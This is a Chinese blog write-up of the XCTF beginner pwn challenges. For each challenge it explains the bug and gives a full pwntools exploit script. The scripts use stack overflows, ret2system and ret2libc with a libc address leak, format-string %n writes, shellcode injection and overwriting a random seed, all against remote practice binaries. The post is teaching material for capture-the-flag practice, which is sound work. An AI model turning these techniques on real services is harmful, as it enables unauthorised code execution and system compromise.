攻防世界 pwn新手区 wp

最新推荐文章于 2024-07-25 08:36:21 发布
最新推荐文章于 2024-07-25 08:36:21 发布
阅读量483 收藏 4
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gtooler/article/details/120641641
版权
本文详细介绍了多个缓冲区溢出和格式化字符串漏洞的利用方法,包括计算偏移量、构造exploit payload以及利用系统函数获取shell。涉及到的技巧包括栈溢出、地址计算、shellcode注入等,展示了在不同场景下如何利用这些漏洞来控制系统执行流程。
摘要由CSDN通过智能技术生成

get-shell

Snipaste_2021-10-04_09-31-39

此题是经典入门题,没有设置任何漏洞,直接给了shell

直接nc连上,然后ls,最后cat flag即可

hello_pwn

Snipaste_2021-10-04_09-35-53

Snipaste_2021-10-04_09-36-00

发现只要让dword_60106C == 1853186401就可以拿到flag

read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存

Snipaste_2021-10-04_09-38-48

计算距离为4,写个exp即可

from pwn import *

p = remote('111.200.241.244', '56851')
p.recvuntil(b" ~~     ")
p.recvuntil(b"bof\n") #puts会自动换行
payload = b'a' * 4 + p64(0x6E756161)
p.sendline(payload)
p.interactive()

p.recvuntil有没有都行

level0

请添加图片描述

Snipaste_2021-10-04_09-42-05

main函数很简单,看到read,猜测是溢出题

然后找到了这个函数

Snipaste_2021-10-04_09-43-56

去数据里看看
请添加图片描述

r是return address,所以只要让函数返回的地方ip是callsystem的地址就行了

Snipaste_2021-10-04_09-45-36

计算记录 128 + 8 = 136

写出exp

from pwn import *

p = remote('111.200.241.244', '56851')
payload = b'a' * 136 + p64(0x400596)
p.sendline(payload)
p.interactive()

level2

Snipaste_2021-10-04_09-51-36

Snipaste_2021-10-04_09-51-44

进去主函数,发现read,应该还是溢出题

但是并没有找到获取shell的system,这题要自己设置

先找到bin/sh的位置

Snipaste_2021-10-04_09-53-50

再看看数据的位置

请添加图片描述

计算距离

136 + 4 = 140

exp如下

from pwn import *

p = remote('', '')
e = ELF("./level2")
sysaddr = e.symbols['system']
payload = b'a' * 140 + p32(sysaddr) + p32(0) + p32(0x0804A024)
p.sendline(payload)
p.interactive()

或者

from pwn import *

p = remote('111.200.241.244', '63389')
e = ELF("./level2")
sysaddr = e.symbols['system']
binsh_addr = next(e.search(b'/bin/sh'))#拿到字符串的地址
payload = b'a' * 140 + p32(sysaddr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()

为什么会有一个p32(0),因为栈中的结构如图

Snipaste_2021-10-04_13-22-49

函数返回地址随便覆盖一个就行了,因为system函数已经执行完了,无所谓地址返回哪里

参数一应该覆盖为/bin/sh

这样才可以实现systtem(/bin/sh)

string

废话连篇的一道题,还是得找到关键函数的关键位置

main函数

Snipaste_2021-10-04_16-22-08

sub_400D72函数

请添加图片描述

sub_400CA6函数

Snipaste_2021-10-04_16-23-43

红色框框中的是把v1强制转换成函数指针然后执行,所以只要把shellcode写到v1里面就可以了

所以想要执行shellcode就得让a1[0] = a1[1]

从主函数可以得知*a1是68,a1[1]是85

要想办法让*a1变成85

在sub_400CA6函数上面有个sub_400BB9函数

请添加图片描述

很明显存在格式化字符串漏洞,用%K$n赋值就可以了

不过要先用%p去找偏移的距离

请添加图片描述

发现偏移距离为7

写出exp

from pwn import *
context(os = 'linux', arch='amd64')
p = remote('111.200.241.244', '51063')

p.recvuntil(b'secret[0] is ')
addr = int(p.recvuntil(b'\n')[:-1],16) #换行符要去掉,所以是[:-1]
print(addr)

p.recvuntil(b'name be:\n')
p.sendline(b'gxh191')
p.recvuntil(b'up?:\n')
p.sendline(b'east')
p.recvuntil(b'leave(0)?:\n')
p.sendline(b'1')
p.recvuntil(b'address\'\n')
p.sendline(str(addr).encode())
p.recvuntil(b"And, you wish is:\n")
payload=b"%085d%7$n"
p.sendline(payload)
p.recvuntil(b'SPELL\n')
p.sendline(asm(shellcraft.amd64.linux.sh()))
p.interactive()

guess_num

Snipaste_2021-10-06_17-14-14

题目意思就是猜数字,连续十次就给成功,然后sub_C3E函数里面就是cat flag

数字是随机数,但其实是伪随机数,是根据seed来生成的,所以知道seed,就结束了

所以我们可以控制利用gets(v7)来进行栈溢出,从而控制seed,看看栈中的情况2

var_30是v7,偏移距离为0x20

exp如下

from pwn import *
from ctypes import *

p = remote('111.200.241.244','53905')
payload = b'a' * 0x20 + p64(1)
c = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")#可以用ldd找对应的库
c.srand(1)
p.recvuntil(b'name:')#printf不会自动加\n,所以不用加上
p.sendline(payload)
for i in range(10):
    p.recvuntil(b"number:")
    p.sendline(str(c.rand() % 6 + 1).encode())
p.interactive()

Snipaste_2021-10-06_16-44-27

然后就可以得到flag

int_overflow

请添加图片描述

两个read函数都没得溢出

进check看看

2

发现v3是八位无符号数,可以实现溢出,只要溢出之后长度大于3小于等于8就行了

可以令输入的长度为260,溢出之后为4,符合条件

最后输入的内容会通过strcpy给到dest,进去看看偏移距离

Snipaste_2021-10-06_19-59-08

为0x18,十进制为24

shift+f12可以找到cat flag,进去Snipaste_2021-10-06_20-03-03看是一个函数

地址为0x0804868B

exp如下

#! /usr/bin/env python3
from pwn import *

p = remote('111.200.241.244', '61220')
payload = b'a' * 0x18 + p32(0x0804868B)
payload += (260 - len(payload)) * b'a'
p.sendlineafter(b'choice:', b'1')
p.sendlineafter(b'username:\n', b'gxh191')
p.sendlineafter(b'passwd:\n', payload)
p.interactive()

cgpwn2

Snipaste_2021-10-06_20-46-02

前面都是不重要的东西,就看这两个gets就行,name在bss段,可读可写,所以把/bin/sh\x00传进去就行了,然后利用s进行栈溢出就行了,跟前面的题没啥区别

exp如下

from pwn import *

p = remote('111.200.241.244', '64417')
p.sendlineafter(b'your name\n', b'/bin/sh\x00')
e = ELF("./cgpwn2")
sysaddr = e.symbols['system']
payload = b'a' * 0x2A + p32(sysaddr) + p32(0) + p32(0x0804A080)
p.sendlineafter(b'message here:\n', payload)
p.interactive()

Snipaste_2021-10-06_20-20-59

level3

请添加图片描述

只有一个栈溢出和libc,可以利用write泄露write的真实地址,然后减去libc中的距离,就可以得到libc的offset,从而利用基址加偏移的方式就能得到system的地址和/bin/sh的地址

libc动态库中的write函数和system函数距离有多远,链接之后他们的距离就有多远,也就是offset都是一样的

真实地址 = libc中的函数基址 + 相同的offset

exp如下

#! /usr/bin/env python3
from pwn import *

p = remote('111.200.241.244', '57487')

elf=ELF('./level3')
libc=ELF('./libc_32.so.6')

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
write_libc = libc.symbols['write']
sys_libc = libc.symbols['system']
sh_libc = next(libc.search(b'/bin/sh'))

payload = b'a'*140 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendlineafter(b"Input:\n",payload)

write_got_addr = u32(p.recv()[:4])

offset = write_got_addr - write_libc
sys_addr = offset + sys_libc
bin_sh_addr = offset + sh_libc

payload0 = b'a'*140 + p32(sys_addr) + p32(1) + p32(bin_sh_addr)
p.sendlineafter(b"Input:\n", payload0)
p.interactive()

CGfsb

请添加图片描述

很明显是一个格式化字符串漏洞,利用printf即可

请添加图片描述

偏移为8,name写入的是中间位置,这里要记得写两个a来补齐

exp如下

#! /usr/bin/env python3
from pwn import *

p = remote('111.200.241.244', '52273')

p.recvuntil(b'name:\n')
name = b'aa' + p32(0x0804A068)
p.sendline(name)

p.recvuntil(b"please:\n")
payload=b"%08d%8$n"
p.sendline(payload)

p.interactive()
gxhhh191
关注
攻防世界pwn新手整理
Lenard404的博客
08-19 3200
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
pwn攻防世界 pwn新手wp
woodwhale的博客
08-10 7289
pwn攻防世界 pwn新手wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2174
攻防世界hello pwn WPpwn入门基础题)的简单讲解
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
07-25 4847
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
攻防世界pwn新手
cm_zl
04-27 491
level2 guess num int overflow level0 level3 level2 ## guess num ## int overflow ## level0 level3
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2402
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界pwn新手练习-hello_pwn
CSDN_sunrise的博客
08-28 759
hello_pwn查看基本信息并运行文件 查看基本信息并运行文件
攻防世界PWN新手WP
weixin_45461609的博客
02-23 1890
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新 get shell nc + 地址 直接连接cat flag when did you born 运行一遍,报错,段错误,栈溢出 拖进IDA 可以观察到当v5==1926的时候就会cat flag 但是当v5 == 1926 的时候又会报错 观察到这里还有一个v4而且是栈溢出的点 不妨点进去...
adworld攻防世界-pwn-新手-wp
令则
03-05 1185
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
攻防世界pwn新手练习——level0
smsyz2019的博客
10-31 1685
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界 pwn 新手练习 hello_pwn
ChaoYue_miku的博客
07-06 551
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
pwn学习-攻防世界新手
qq_45653588的博客
12-20 1510
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
攻防世界pwn新手练习-level0
CSDN_sunrise的博客
08-29 468
level0查看基本信息并运行文件在IDA中分析exp 查看基本信息并运行文件 查看文件类型: file level0 查看保护: checksec --file=level0 运行文件:./level0 该文件在我的电脑中的文件名为level0 在IDA中分析 文件64位,将其拖入64位ida中。 按Space切换视图 按F5生成伪代码 发现另外一个函数: 分析: 我们只需要调用callsystem()函数就可以得到flag,而vulnerable_function()函数中调用了read()函数,
攻防世界pwn新手练习-when_did_you_born
CSDN_sunrise的博客
08-26 292
when_did_you_born查看基本信息并运行文件在IDA中分析 查看基本信息并运行文件 查看文件类型: file when_did_you_born 查看保护: checksec --file=when_did_you_born 运行文件:./when_did_you_born 在IDA中分析 文件64位,将其拖入64位ida中。 按 ...
攻防世界闯关记录_pwn新手
s1054436218的博客
10-02 721
  开个新坑,记录自己刷XCTF攻防世界pwn题,因为刚入门吧,从新手篇开始练起。这次一边做题一边写笔记和writeup,巩固一下自己学到的东西。 get_shell   这道题我不太想写writeup……做过的人肯定明白 CGfsb   这道题其实是一道非常简单的格式化字符串题,凭借着自己对格式化字符串的记忆,以及大量动态调试,最后还是把这道题做出来了。记录一下自己调试的过程吧,随便找...
PWN入门分享
CK_0ff的博客
02-08 9622
文章目录什么是PWNPWN的前置技能可执行文件常见漏洞基础环境环境配置步骤栈溢出漏洞栈函数调用栈ELF文件文件保护机制CanaryNXPIE(ASLR)RELROlinux内存布局结语 pwn基础入门分享 什么是PWN? 以下内容摘自百度百科: ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了 。 ​ PWN也可译为二进制漏洞挖掘,在CTF比赛中,PWN题的目标是拿到flag,一般是在l
攻防世界pwn新手题解-level3
weixin_62621015的博客
04-17 1125
攻防世界pwn-level3详细题解。
攻防世界 pwn
清霂的博客
02-02 695
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
pwn入门(1)
weixin_44954083的博客
02-09 467
知识点主要是:缓冲溢出缓冲溢出的利用方式return to dl resolve 堆溢出off by one 格式化字符串漏洞 需要用到的程序是gdb、gdb-peda、gcc、python、pwntools、socat、rp++、readelf 缓冲溢出简介:(栈) ps:这个图方便大家理解栈的结构 可以看出这个函数的有一个参数和两个局部变量,因为局部变量和参数会放在函数的栈帧上而且这个栈...
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲大小时,会覆盖到相邻的内存域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单题练习 答题(1-10题解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值